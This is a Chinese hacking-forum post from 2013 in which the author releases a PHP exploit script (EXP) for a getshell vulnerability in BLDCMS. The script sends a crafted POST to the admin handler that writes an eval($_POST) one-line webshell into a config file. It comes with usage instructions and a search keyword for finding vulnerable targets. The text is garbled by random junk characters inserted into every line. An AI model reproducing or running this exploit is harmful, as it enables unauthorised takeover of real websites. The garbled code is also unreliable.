之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
. D m3 ~3 n3 z! n
& ~. Y; Q9 r8 I4 L6 J# L/ o
6 v5 j V) R! v/ }, n话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
: }* ^+ C) i* b( {! p7 a; n
$ f% D; t' _. ~ S既然都有人发了 我就把我之前写好的EXP放出来吧4 G+ K7 K+ z. h3 |; m# z3 ~
; [! o9 n: h" \( F( v/ u
view source print?01.php;"> L$ S! N9 o/ _/ Z+ { P3 m
02.<!--?php3 z: k% T9 d8 h7 W9 a1 m
03.echo "-------------------------------------------------------------------
4 V$ r8 f% B) U6 L& N04. 4 y: z6 T2 R0 L' ~# ?
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
9 |5 y& z5 ^ W( v! G& J06. & m( z1 B: h) V$ ]
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
) C1 \4 X7 a* A( g& V08. : i/ o$ Z8 X1 m, p
09.QQ:981009941\r\n 2013.3.21\r\n ' W2 Y9 |8 r) C7 k1 W" Y* s
10. 1 ^+ u8 ]3 Y& j! c0 P
11.
. k0 \3 }+ Z A5 |) W6 I12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码) A. |, a1 l9 Q6 b7 n
13.
8 J, Y2 s3 Y6 J; b6 L. `" `+ z14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 M! x" C6 g8 H
15.
3 x9 R. I, ?" o! P6 q! N16.--------------------------------------------------------------------\r\n";; g* G" `& {/ }) C
17.$url=$argv[1];
" F6 p% J6 j/ J6 K( T6 H' q% A18.$dir=$argv[2];+ m2 |: V" U3 L4 R4 ?5 e3 o# T3 z
19.$pass=$argv[3];5 K1 E& Y% K$ z) X- L$ H
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" p& ?3 s( n1 m( k
21.if (emptyempty($pass)||emptyempty($url))
3 P( w& f' J9 _1 f22.{exit("请输入参数");}* G1 W7 L# t3 q4 I7 \
23.else1 M4 Q/ `4 Y- Y! y3 O& m
24.{, p$ f) v: Y' N9 a# n/ e* Q
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev, s" _1 b' b" i, M8 O9 |
26.
5 P3 W5 l/ ? A7 F X27.al;- k+ m7 O# Z' D( \. L
28.$length = strlen($fuckdata);. l/ O9 A- ?3 F
29.function getshell($url,$pass); O& Y; E6 q; K3 C, r7 E' q2 h1 [
30.{9 _4 m! W, o( a, n. t& K& U Z
31.global $url,$dir,$pass,$eval,$length,$fuckdata;% G9 Y! R" {# @* ?3 q8 b
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
1 u& t( E; @ f1 w( u# C33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";+ H; f) B9 ^3 M. l( T0 }$ u* G
34.$header .= "User-Agent: MSIE\r\n";
. \; W, c c( u3 A- ]% `3 i35.$header .= "Host:".$url."\r\n";
' h! C+ \7 y) b C( e36.$header .= "Content-Length: ".$length."\r\n";7 l/ p, z7 R' I9 m# }
37.$header .= "Connection: Close\r\n";
% g* m2 ^ i( c* S/ S38.$header .="\r\n";
+ \, R/ h" c+ @ ]+ l39.$header .= $fuckdata."\r\n\r\n";- E: V& j5 v8 W/ {) A
40.$fp = fsockopen($url, 80,$errno,$errstr,15);! n' p( `; T* N/ I1 [$ `2 a" R
41.if (!$fp)
" {$ i8 u+ O' ~42.{
% c/ E) _/ e4 r' K" C43.exit ("利用失败:请检查指定目标是否能正常打开");- W6 p9 S6 }" v8 v. g4 ?
44.}7 L7 \: `1 H% w6 n6 A
45.else{ if (!fputs($fp,$header))
; g$ O: W$ C$ P( r- [) I6 c/ Y46.{exit ("利用失败");}: m) a' V9 }2 k6 b/ v% k
47.else
3 k; D, f u% K8 q' m+ D) i48.{ k* t9 J5 F& m g
49.$receive = '';
. y/ S. w# W! A) z: E( E50.while (!feof($fp)) {0 N/ Z( q z4 U6 n1 ?) I6 X M
51.$receive .= @fgets($fp, 1000);6 b* Z9 F5 b; A$ W' K$ R
52.}
: Z# M9 e& |5 D- r& H' [53.@fclose($fp);- Z% a7 j# P2 R$ E8 z7 H: x
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) X9 q! y# ~" _0 `
55. " v: }) t9 i! Y( P8 C" Q2 i
56.GPC是否=off)";
8 p6 ?, w$ z3 o" @/ ^ H- J57.}}
/ ?' B9 D3 ^. @9 f) Z8 c58.}
) l0 i% P( j) ^: c59.}& T7 \7 I+ A$ B* K
60.getshell($url,$pass);# K3 D) j& l# |6 O4 C) d2 R7 [. Q
61.?-->/ Z; S( R* z" _ i
7 U& q9 ~: h" _& b- f7 A9 O6 M( C5 t) z2 x, Y3 Y; |# _
/ S J% R: |9 K
by 数据流/ K; G+ k+ w6 u# s9 c
|
发表于 2013-3-26 20:49:10
收藏
支持
反对